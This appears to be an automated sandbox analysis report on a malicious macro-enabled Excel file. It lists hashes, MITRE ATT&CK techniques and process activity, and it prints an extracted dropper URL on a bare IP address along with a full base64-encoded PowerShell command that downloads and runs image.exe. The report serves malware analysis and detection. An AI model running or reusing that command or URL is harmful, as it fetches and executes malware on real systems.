ebb51c798e70ceb39e210269ceef3495cad9bd3d04b6bb18b00bbbc07f70283a

General

Target

0c69053bf59475cd7889a37427a32caa28bc94a7bff0f4d2052b89dd8d08889f.xlsm
Size

9KB
MD5

f5e976ded990b7d3ae74eb922b397006
SHA1

482b374c7e9ddc7174fa18589640d990f9318d29
SHA256

0c69053bf59475cd7889a37427a32caa28bc94a7bff0f4d2052b89dd8d08889f
SHA512

7ef67ad8210323a7c391b3d8832cd7374ced9d804d6b4dfd9f301cea4189103ba6d80c2d6ff96258ba1b110c9b3bc12bcac18c74caed3ac7f209248078bb0b86
SSDEEP

192:f29RnkbMcdopW9yj2zHpD7ho5LUNBRfGJhKniUGdyfxSfGQm:fGk9d2j2DpD18OmuGkfmG/

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.92.100.208/toss/image.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2884	2400	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2904 powershell.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

2400 EXCEL.EXE

flow	pid	process
4	2904	powershell.exe

pid	process
2400	EXCEL.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

EXCEL.EXEcmd.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\D2B67F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2400 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2904 powershell.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

2400 EXCEL.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2904 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

2400 EXCEL.EXE
2400 EXCEL.EXE
2400 EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\D2B67F00\:Zone.Identifier:$DATA	EXCEL.EXE

pid	process
2400	EXCEL.EXE

pid	process
2904	powershell.exe

pid	process
2400	EXCEL.EXE

description	pid	process
Token: SeDebugPrivilege	2904	powershell.exe

pid	process
2400	EXCEL.EXE
2400	EXCEL.EXE
2400	EXCEL.EXE

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

EXCEL.EXEcmd.exe

description	pid	process	target process
PID 2400 wrote to memory of 2884	2400	EXCEL.EXE	cmd.exe
PID 2400 wrote to memory of 2884	2400	EXCEL.EXE	cmd.exe
PID 2400 wrote to memory of 2884	2400	EXCEL.EXE	cmd.exe
PID 2400 wrote to memory of 2884	2400	EXCEL.EXE	cmd.exe
PID 2884 wrote to memory of 2904	2884	cmd.exe	powershell.exe
PID 2884 wrote to memory of 2904	2884	cmd.exe	powershell.exe
PID 2884 wrote to memory of 2904	2884	cmd.exe	powershell.exe
PID 2884 wrote to memory of 2904	2884	cmd.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\0c69053bf59475cd7889a37427a32caa28bc94a7bff0f4d2052b89dd8d08889f.xlsm
1⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c Txgiywqiwpp.bat
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBMAGoAegBmAG8AcwBvAHgAbQBuAHMAZQB0AGoAYgBhAGcAawAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADEAMwAuADkAMgAuADEAMAAwAC4AMgAwADgALwB0AG8AcwBzAC8AaQBtAGEAZwBlAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0c69053bf59475cd7889a37427a32caa28bc94a7bff0f4d2052b89dd8d08889f.xlsm

Filesize
17KB

MD5
2e76ec4600ae699664ec9c7ea95947be

SHA1
fa9e3bd3eaa56c90d8df2799a8139659e6663c5c

SHA256
135dcd1c5895095f58676abf2012ddefac845532bff1b2fe2f5a42a55199c3dd

SHA512
59b30d4c520ffc506df6212c1cbdb57bdad0e2155ca437a2a6aeb5a7e47941efff3b9075f975e4c1a82ddf7c4aef5562e756042f60ca835cf29b117070191136

Download Submit
C:\Users\Admin\Documents\Txgiywqiwpp.bat

Filesize
587B

MD5
c8f9ae97e9408bb8761d4ef495478d57

SHA1
18063300385b88f51ad620f145e62560cfa598c8

SHA256
4935c2ed8f0a3243204881cef276c5ad0006097053c459749e3cfb2901dac41e

SHA512
dd0552396ea3b5e04aaf83b5f7f84294002cf2b87c9ae111d8838c7f758b3c6e34af9d4ffdcacfe717b6610e96995e12082ecb64d7f46ee910e87825c1652fd9

Download Submit
memory/2400-32-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-9-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-33-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2400-30-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-31-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-29-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-28-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-1-0x0000000072A5D000-0x0000000072A68000-memory.dmp

Filesize
44KB

Download
memory/2400-11-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-10-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-7-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-8-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-6-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-5-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-4-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-3-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-2-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-27-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2400-37-0x0000000072A5D000-0x0000000072A68000-memory.dmp

Filesize
44KB

Download
memory/2400-38-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads